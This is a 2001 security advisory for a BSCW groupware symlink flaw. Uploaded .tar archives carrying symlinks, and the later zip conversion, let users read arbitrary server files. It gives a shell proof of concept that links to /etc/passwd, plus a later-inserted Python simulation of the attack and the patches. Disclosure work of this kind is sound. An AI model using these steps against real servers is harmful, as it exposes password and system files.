BSCW symlink vulnerability

Aug 23, 2001 (SECURITYVULNS:DOC:1964, via vulners.com)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

BSCW Security Issues

[ Vulnerability Type ]
BSCW follows symbolic links that a user smuggles into the server's data directory inside an uploaded .tar archive.

[ Effect ]
A malicious user can read any file on the system that the UID running BSCW can read.

[ Software affected ]
BSCW 3.x (only on Unix-like systems)

[ Severity ]
medium to high risk (depends on what the BSCW UID can read; see below)

[ Solution ]
Install the patches / updates from http://bscw.gmd.de/pycXX , where XX is
the version of your Python installation.

DESCRIPTION:

BSCW is a groupware system that runs on a web server. For more information
about BSCW visit the developer websites (http://bscw.gmd.de/ and
http://www.orbiteam.de ).

While playing around with symlinks and how the BSCW system handles them, I
noticed that it follows them. Since BSCW lets users extract .tar files into
their "data-bag" (private space), a malicious user can exploit this symlink
following. To do this he/she creates a .tar file that contains a symlink
pointing to a file he/she wants to read. After this .tar file has been
uploaded to the BSCW server and extracted by clicking the "extract" menu
option, the user's "data-bag" contains the symlink as a BSCW data object.
Clicking on it makes BSCW follow the symlink and retrieve the target file, so
the user can download/view it.

Example:

my_host:/tmp/>ln -s /etc/passwd testlink
my_host:/tmp/>tar cvf testlink.tar testlink

After uploading it to the BSCW server and extracting it, you can click on the
"testlink" item in your "data-bag" and retrieve the server's /etc/passwd
file.

Basically the attacker can view any file on the system, as long as the UID
under which BSCW runs can access it. In most cases this will be the web
server's UID (nobody, wwwrun). This gives the malicious user access to BSCW
data items he could not normally read or, worse, lets him retrieve the BSCW
password file for cracking other users' passwords, or gather information for
further penetration of the system.

The early "op_extract" patch fixes this but leaves a few other exploitable issues.

Another vulnerability lies in the standard installation, which calls the
external "zip" tool when converting .tar files to .zip files. After the
"op_extract" patch you could no longer access the symlink directly, because
the new extract function only checks for symlinks after tar has already run,
so the link itself is still present on disk. By converting the attacker's
.tar file to a .zip file, zip follows the symlink and packs the file it
points to. If you have customised calls to external programs (e.g. archive
conversion utilities) in your BSCW system configuration, you should check
whether symlink following can be exploited there as well.

The latest patch, "untar.py", introduces a wrapper that looks for symlinks
before extraction and seems to fix all symlink vulnerabilities.
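The whole chain described above (a symlink inside an uploaded .tar, its extraction into the data-bag, the download that follows it, and the .tar-to-.zip conversion that still leaks once a link is on disk even though the download is refused) as an added Python example. This is not BSCW's code and not the op_extract or untar.py patch; the helper names (build_symlink_tar, extract, retrieve, convert_to_zip, demo) are hypothetical, and a constructed file in a temporary directory stands in for /etc/passwd. It contrasts the three states the advisory describes: unpatched, a check applied only at retrieval time after tar has run, and a wrapper that rejects link members before anything is written.

```python
import io
import os
import tarfile
import tempfile
import zipfile

# Constructed illustration, not BSCW's own code; all helper names are hypothetical.
SAMPLE_PASSWD = b"root:x:0:0:root:/root:/bin/sh\n"  # constructed stand-in for /etc/passwd


def build_symlink_tar(link_name, target):
    """In-memory version of:  ln -s <target> <link_name>; tar cvf x.tar <link_name>"""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(link_name)
        info.type = tarfile.SYMTYPE
        info.linkname = target
        tar.addfile(info)
    return buf.getvalue()


def _inside(databag, name):
    """Lexical check against '../x' member names; deliberately does not resolve symlinks."""
    root = os.path.abspath(databag)
    path = os.path.abspath(os.path.join(root, name))
    if os.path.commonpath([root, path]) != root:
        raise ValueError("member %r escapes the data-bag" % name)
    return path


def extract(tar_bytes, databag, reject_links):
    """reject_links=False: pre-patch behaviour, the link lands on disk.
    reject_links=True: the before-extraction check an untar.py-style wrapper does."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes)) as tar:
        for m in tar.getmembers():
            path = _inside(databag, m.name)
            if m.issym() or m.islnk():
                if reject_links:
                    raise ValueError("refusing link %r -> %r" % (m.name, m.linkname))
                os.symlink(m.linkname, path)
            elif m.isfile():
                with open(path, "wb") as f:
                    f.write(tar.extractfile(m).read())


def retrieve(databag, name, follow_links):
    """Serve a data-bag item ('clicking' it). follow_links=True: open() follows
    the link and hands back the target's bytes, which is the original bug."""
    path = _inside(databag, name)
    flags = os.O_RDONLY
    if not follow_links:
        if os.path.islink(path):
            raise ValueError("refusing to follow link %r" % name)
        flags |= getattr(os, "O_NOFOLLOW", 0)  # POSIX only; closes the check-then-open race
    with os.fdopen(os.open(path, flags), "rb") as f:
        return f.read()


def convert_to_zip(databag, name, follow_links):
    """.tar -> .zip conversion. zipfile.write() opens the path just as the external
    zip tool does, so a link still on disk gets its target packed (second issue)."""
    path = _inside(databag, name)
    if not follow_links and os.path.islink(path):
        raise ValueError("refusing to pack link %r" % name)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.write(path, arcname=name)
    return buf.getvalue()


def demo():
    """Run the scenario in a scratch directory; returns what each step yields."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "secret")
        with open(secret, "wb") as f:
            f.write(SAMPLE_PASSWD)
        tar_bytes = build_symlink_tar("testlink", secret)
        out = {}
        # 1. unpatched: the link is extracted and clicking it reads the target
        bag = os.path.join(tmp, "bag_naive")
        os.mkdir(bag)
        extract(tar_bytes, bag, reject_links=False)
        out["naive_click"] = retrieve(bag, "testlink", follow_links=True)
        # 2. retrieval-time check only: the click is refused, but the link is still
        #    on disk and the zip conversion leaks the target anyway
        try:
            retrieve(bag, "testlink", follow_links=False)
            out["guarded_click"] = "leak"
        except ValueError:
            out["guarded_click"] = "blocked"
        zipped = convert_to_zip(bag, "testlink", follow_links=True)
        with zipfile.ZipFile(io.BytesIO(zipped)) as z:
            out["zip_leak"] = z.read("testlink")
        # 3. untar.py-style fix: links are refused before anything touches disk
        bag2 = os.path.join(tmp, "bag_fixed")
        os.mkdir(bag2)
        try:
            extract(tar_bytes, bag2, reject_links=True)
            out["fixed_extract"] = "accepted"
        except ValueError:
            out["fixed_extract"] = "rejected"
        out["fixed_bag_contents"] = os.listdir(bag2)
        return out
```

Calling demo() returns a dict: naive_click and zip_leak both hold the stand-in passwd bytes, guarded_click is "blocked", and fixed_extract is "rejected" with an empty data-bag. The pre-extraction check is the one that matters: once a link exists on disk, every later consumer (the download handler, the zip converter, any customised packer call) has to be audited individually, which is exactly the class of issue the paragraph above on customised external-program calls warns about.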

You can download the patches and view the installation instructions at
http://bscw.gmd.de/pycXX , where XX is the version of your installed Python
package (e.g. http://bscw.gmd.de/pyc20 for Python 2.0).

The developers of BSCW have done a good job patching the security holes
within 24h after I sent them a notice about the vulnerability.

neovatar
neovatar(at)wiretap(dot)de
public key at http://www.wiretap.de/neovatar.pub

DISCLAIMER:
I am not affiliated with GMD, ORBITEAM or BSCW in any way. Registered
trademarks and terms in this report belong to their owners.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE7hFTBzEyYWk8cQasRAhAiAKCOCYleJnk49KxPDzAht2GPwKmbKgCdGQBq
iHXuhdS5onO9/JAs97FhrH0=
=gmh1
-----END PGP SIGNATURE-----